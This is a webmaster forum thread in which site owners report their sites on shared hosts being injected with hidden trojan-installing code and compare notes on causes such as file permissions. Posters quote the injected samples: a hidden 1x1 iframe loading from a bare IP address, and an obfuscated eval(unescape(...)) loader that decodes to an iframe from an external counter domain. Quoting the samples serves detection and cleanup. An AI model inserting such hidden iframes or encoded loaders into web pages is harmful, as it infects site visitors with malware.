more than 100 of my sites infected with trojans - check yours

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Antonio
    Too lazy to set a custom title
    • Oct 2001
    • 14136

    #1

    more than 100 of my sites infected with trojans - check yours

    first of all a big thanks to KimJI to pointing it out to me


    the sites are on two hosts, dreamhost and rocktflow, all my other hosts seem ok

    anyway, if you have sites on these two hosts, you should ckeck them - one line of iframe code in the index file, no idea what the code does




    what a lovely way to spend your Sunday morning
  • Aussie Rebel
    Blow Me U Geeks
    • Aug 2001
    • 5108

    #2
    Can you please post the code so we know what we are looking for? thanks

    Comment

    • Matt 26z
      So Fucking Banned
      • Apr 2002
      • 18481

      #3
      Are you running any scripts that may have a security hole?

      Comment

      • BOSS1
        Confirmed User
        • Sep 2005
        • 4331

        #4
        Damn good that you noticed before you lost all bookmarkers!

        NEW SITE: Stockings Kingdom
        Lesbians in Latex, Lesbians in Stockings, Granny Sex, BDSM Porn, Latex and Sex, Custom Foot Fetish, Femdom Movies and Kinky Porn Pass.
        300+ hosted flvs, 500+ hosted galleries, Page Peel ADs.. NATS export and payouts twice a month

        Comment

        • Antonio
          Too lazy to set a custom title
          • Oct 2001
          • 14136

          #5
          Originally posted by Aussie Rebel
          Can you please post the code so we know what we are looking for? thanks

          Code:
          <iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

          as I said no idea what id does and I don't want to know but I know for sure that I didn't put it there


          Originally posted by Matt 26z
          Are you running any scripts that may have a security hole?

          nope, at first I thought it was from the recent linex security hole, but when I started checking my sites - ALL of them were infected (I have linkex on only 15 sites or so), some of them are wordpress blogs, some are single index html file, some are running tgp scripts, basically mixed bag of goodies

          Comment

          • gooddomains
            Too lazy to set a custom title
            • Jul 2003
            • 10127

            #6
            fucking spyware

            Comment

            • ladida
              Confirmed User
              • Nov 2005
              • 2179

              #7
              It's a trojan installer. You're in for some mess.
              agentGFY *at* gmail.com

              Comment

              • facialfreak
                Confirmed User
                • Feb 2005
                • 3018

                #8
                Seems to be an epidemic with Dreamhost'ed sites ...

                And its too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ...

                I feel your pain Antonio, but unfortunately it usually takes something of this nature for webmasters to take a crash course in simple website security.

                Managed Shared Hosting starting at $4.99/mo
                Managed VPS starting at $29.99/mo


                Comment

                • Scootermuze
                  Confirmed User
                  • Dec 2001
                  • 4513

                  #9
                  I had that happen on a few sites of mine from a diofferent server... I guess the perps just make their rounds from host to host..

                  I started checking them daily and removing the script as they popped up.. eventually went away...

                  Comment

                  • Quickdraw
                    Confirmed User
                    • Mar 2004
                    • 1717

                    #10
                    Here is another hack that has hit Dreamhost for sites like dommephonesex.com, thecollegeslut.com, beckybank.com,fortheloveoffeet.com,bbwbecky.com
                    and haven't been fixed for months..

                    Code:
                    >eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%74%61%74%31%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%31%36%37%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
                    which turns to this
                    iframe src=http://stat1count.net/strong/167
                    
                    and they also have iframe as well
                    
                     src='hxxp://mediacount.net/adv/013/new.php' width=1 height=1>

                    Comment

                    • ridikuloz
                      Confirmed User
                      • Jun 2005
                      • 2080

                      #11
                      happened to me before.... fuckin' russians :X
                      Each persons' level of stupidity makes us different.

                      Comment

                      • TeenCat
                        Too lazy to set a koala
                        • Jan 2007
                        • 16131

                        #12
                        umm ... i think i am on the internet thanks for sharing that info!

                        6bot
                        / Coming again very soon!
                        Svit Zlin Radio 24/7!

                        Comment

                        • Mutt
                          Too lazy to set a custom title
                          • Sep 2002
                          • 34431

                          #13
                          i had that one months ago - removed it and it never came back. i did have a WordPress installation on the server and that's the only guess I have for how they got in.
                          I moved my sites to Vacares Hosting. I've saved money, my hair is thicker, lost some weight too! Thanks Sly!

                          Comment

                          • GrouchyAdmin
                            Now choke yourself!
                            • Apr 2006
                            • 12085

                            #14
                            This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account, and directories are not properly chowned.

                            There's a performance hit for it, but it's well worth the cost of administration and notifying your clients. One old WP 1.5 install doesn't destroy hundreds of sites.

                            Comment

                            • Pornopat
                              AdultTubeSubmits.com
                              • Dec 2003
                              • 10598

                              #15
                              Had that one and it gave me a fucking headache for months.It just kept coming back in different forms.
                              https://stripcash.com/sign-up/?userI...fff832eb95ab6a

                              Comment

                              • d-null
                                . . .
                                • Apr 2007
                                • 13724

                                #16
                                bumping this because I just noticed that I have been hit on two different hosts

                                my own site triggered my norton virus detection and I checked and it is the same code but mine was directing to mediacount.net

                                bastards

                                __________________

                                Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad!
                                Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs
                                Check out the #1 WordPress SEO Plugin: CyberSEO Suite

                                Comment

                                • d-null
                                  . . .
                                  • Apr 2007
                                  • 13724

                                  #17
                                  I notice that mediacount.net is a russian site as well.

                                  Check your index.html files... they only got into my main domains (not the subdomains)

                                  __________________

                                  Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad!
                                  Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs
                                  Check out the #1 WordPress SEO Plugin: CyberSEO Suite

                                  Comment

                                  • cess
                                    Confirmed User
                                    • Sep 2006
                                    • 2921

                                    #18
                                    Originally posted by facialfreak
                                    Seems to be an epidemic with Dreamhost'ed sites ...

                                    And its too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ...
                                    Eh?? I have two accounts with dreamhost and every domain I've ever added always had extra web security "enabled". Every file on my dreamhost accounts are owned by my user name and not apache.

                                    Comment

                                    • cess
                                      Confirmed User
                                      • Sep 2006
                                      • 2921

                                      #19
                                      Originally posted by GrouchyAdmin
                                      This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account

                                      By default dreamhost does enable that.

                                      Comment

                                      • d-null
                                        . . .
                                        • Apr 2007
                                        • 13724

                                        #20
                                        mine was not dreamhost and I found the problem on two completely separate distinct servers, so it is a good idea to check your files periodically no matter who you are hosting with

                                        __________________

                                        Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad!
                                        Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs
                                        Check out the #1 WordPress SEO Plugin: CyberSEO Suite

                                        Comment

                                        • Az A Bay Bay
                                          Confirmed User
                                          • Sep 2007
                                          • 1129

                                          #21
                                          congrats!

                                          Home of Ed Powers and america's next hot pornstar

                                          Comment

                                          • riddler
                                            Confirmed User
                                            • Oct 2004
                                            • 3726

                                            #22
                                            rocketflow servers seem to get rooted alot.

                                            Comment

                                            • alby_persignup
                                              Confirmed User
                                              • May 2007
                                              • 3119

                                              #23
                                              another trojan attacks!
                                              OnProbation Links Directory | OnProbation Design Services | OnProbation Cash

                                              Comment

                                              Working...